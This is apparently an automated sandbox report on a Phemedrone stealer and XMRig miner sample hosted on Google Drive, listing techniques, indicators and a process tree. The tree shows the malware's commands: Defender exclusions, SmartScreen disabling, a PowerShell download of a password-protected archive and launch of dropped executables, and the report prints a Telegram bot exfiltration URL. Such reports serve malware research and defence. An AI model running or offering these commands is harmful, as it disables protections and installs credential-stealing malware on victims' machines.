phemedrone | hxxps://drive[.]google[.]com/file/d/1Fos5FXWRKZbKUUYlQScBJFl7YLdGM4Np/view

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
28-07-2024 06:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://drive.google.com/file/d/1Fos5FXWRKZbKUUYlQScBJFl7YLdGM4Np/view

Score

10^/10

phemedrone xmrig discovery evasion execution miner persistence stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://drive.usercontent.google.com/u/0/uc?id=1cOfdrYTcndJEY8uHrMnDtqUbkax07UMo&export=download

Extracted

Family

phemedrone

https://api.telegram.org/bot7112551293:AAGZhRTgYJ4a8RYnU6UgUDOchJ72jMEo2t0/sendDocument

Signatures

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2640-241-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2640-240-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2640-244-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2640-245-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2640-246-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2640-243-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2640-247-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2640-251-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2640-252-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

136 4304 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2852 powershell.exe
1932 powershell.exe
4304 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Executes dropped EXE 3 IoCs

Processes:

drivers.exeinstaller.exesetup.exe

pid process

1208 drivers.exe
1120 installer.exe
4904 setup.exe

flow	pid	process
136	4304	powershell.exe

pid	process
2852	powershell.exe
1932	powershell.exe
4304	powershell.exe

pid	process
1208	drivers.exe
1120	installer.exe
4904	setup.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2640-237-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2640-241-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2640-240-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2640-239-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2640-235-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2640-238-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2640-236-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2640-244-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2640-245-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2640-246-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2640-243-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2640-247-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2640-251-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2640-252-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

11 drive.google.com
153 pastebin.com
154 pastebin.com
7 drive.google.com
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

Power Settings
T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

4912 powercfg.exe
3660 powercfg.exe
3244 powercfg.exe
5012 powercfg.exe
2024 powercfg.exe
1012 powercfg.exe
2640 powercfg.exe
5012 powercfg.exe

flow	ioc
11	drive.google.com
153	pastebin.com
154	pastebin.com
7	drive.google.com

pid	process
4912	powercfg.exe
3660	powercfg.exe
3244	powercfg.exe
5012	powercfg.exe
2024	powercfg.exe
1012	powercfg.exe
2640	powercfg.exe
5012	powercfg.exe

Drops file in System32 directory 2 IoCs

Processes:

chrome.exe

description	ioc	process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

drivers.exesetup.exe

description	pid	process	target process
PID 1208 set thread context of 4328	1208	drivers.exe	RegAsm.exe
PID 4904 set thread context of 3016	4904	setup.exe	conhost.exe
PID 4904 set thread context of 2640	4904	setup.exe	conhost.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

2084 sc.exe
4904 sc.exe
2940 sc.exe
3944 sc.exe
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

5016 4328 WerFault.exe RegAsm.exe

pid	process
2084	sc.exe
4904	sc.exe
2940	sc.exe
3944	sc.exe

pid	pid_target	process	target process
5016	4328	WerFault.exe	RegAsm.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

drivers.exeRegAsm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	drivers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 6 IoCs

Processes:

chrome.execonhost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133666200686697928"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	conhost.exe

Modifies registry class 1 IoCs

Processes:

chrome.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000_Classes\Local Settings chrome.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

4952 NOTEPAD.EXE
Runs net.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000_Classes\Local Settings	chrome.exe

pid	process
4952	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

Processes:

chrome.exepowershell.exepowershell.exepowershell.exeinstaller.exesetup.exechrome.exe

pid	process
972	chrome.exe
972	chrome.exe
2852	powershell.exe
2852	powershell.exe
2852	powershell.exe
1932	powershell.exe
1932	powershell.exe
1932	powershell.exe
4304	powershell.exe
4304	powershell.exe
4304	powershell.exe
1120	installer.exe
1120	installer.exe
1120	installer.exe
1120	installer.exe
1120	installer.exe
1120	installer.exe
1120	installer.exe
1120	installer.exe
4904	setup.exe
4904	setup.exe
4904	setup.exe
4904	setup.exe
4904	setup.exe
4904	setup.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

chrome.exe

pid process

972 chrome.exe
972 chrome.exe
972 chrome.exe
972 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe
Token: SeShutdownPrivilege	972	chrome.exe
Token: SeCreatePagefilePrivilege	972	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe
972	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 972 wrote to memory of 4836	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4836	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 4980	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 1016	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 1016	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe
PID 972 wrote to memory of 3296	972	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://drive.google.com/file/d/1Fos5FXWRKZbKUUYlQScBJFl7YLdGM4Np/view
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffc82e4cc40,0x7ffc82e4cc4c,0x7ffc82e4cc58
  2⤵
  PID:4836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2036,i,3696251684104360339,8230584085657992973,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2032 /prefetch:2
  2⤵
  PID:4980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1868,i,3696251684104360339,8230584085657992973,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2064 /prefetch:3
  2⤵
  PID:1016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,3696251684104360339,8230584085657992973,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2284 /prefetch:8
  2⤵
  PID:3296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,3696251684104360339,8230584085657992973,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3128 /prefetch:1
  2⤵
  PID:2740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,3696251684104360339,8230584085657992973,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3160 /prefetch:1
  2⤵
  PID:4472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4328,i,3696251684104360339,8230584085657992973,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2252 /prefetch:1
  2⤵
  PID:956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4664,i,3696251684104360339,8230584085657992973,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4624 /prefetch:1
  2⤵
  PID:2736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5500,i,3696251684104360339,8230584085657992973,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5528 /prefetch:8
  2⤵
  PID:4148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5116,i,3696251684104360339,8230584085657992973,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5544 /prefetch:8
  2⤵
  PID:4084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=948,i,3696251684104360339,8230584085657992973,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5676 /prefetch:8
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:5228

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1340

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\NursultanAlpha\start.bat" "
1⤵
PID:4952
- C:\Windows\system32\chcp.com
  chcp.com 437
  2⤵
  PID:4920
- C:\Windows\system32\findstr.exe
  findstr /L /I set "C:\Users\Admin\Desktop\NursultanAlpha\start.bat"
  2⤵
  PID:3804
- C:\Windows\system32\findstr.exe
  findstr /L /I goto "C:\Users\Admin\Desktop\NursultanAlpha\start.bat"
  2⤵
  PID:2464
- C:\Windows\system32\findstr.exe
  findstr /L /I echo "C:\Users\Admin\Desktop\NursultanAlpha\start.bat"
  2⤵
  PID:4084
- C:\Windows\system32\findstr.exe
  findstr /L /I pause "C:\Users\Admin\Desktop\NursultanAlpha\start.bat"
  2⤵
  PID:2076
- C:\Windows\system32\find.exe
  find
  2⤵
  PID:3772
- C:\Windows\system32\find.exe
  find
  2⤵
  PID:1396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:3856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:4808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "if ('C:\Users\Admin\Desktop\NursultanAlpha' -like '*temp*') { exit 1 } else { exit 0 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2852
- C:\Windows\system32\net.exe
  net session
  2⤵
  PID:916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'; Add-MpPreference -ExclusionPath 'C:\ProgramData'; Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1932
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
  2⤵
  PID:724
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
  2⤵
  PID:1716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1cOfdrYTcndJEY8uHrMnDtqUbkax07UMo&export=download', 'C:\Users\Admin\AppData\Local\Temp\support.rar')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4304
- C:\Users\Admin\Desktop\NursultanAlpha\libraries\UnRAR.exe
  "C:\Users\Admin\Desktop\NursultanAlpha\libraries\unrar.exe" x -p34nbGjnngjGn484ngn4nGng34GDG -o+ C:\Users\Admin\AppData\Local\Temp\support.rar C:\Users\Admin\AppData\Local\Temp\Rar23345Ftmp
  2⤵
  PID:3400
- C:\Users\Admin\AppData\Local\Temp\Rar23345Ftmp\drivers.exe
  "C:\Users\Admin\AppData\Local\Temp\Rar23345Ftmp\drivers.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:1208
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4328
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 1096
      4⤵
      Program crash
      PID:5016
- C:\Users\Admin\AppData\Local\Temp\Rar23345Ftmp\installer.exe
  "C:\Users\Admin\AppData\Local\Temp\Rar23345Ftmp\installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1120
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:2640
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:5012
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:3660
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
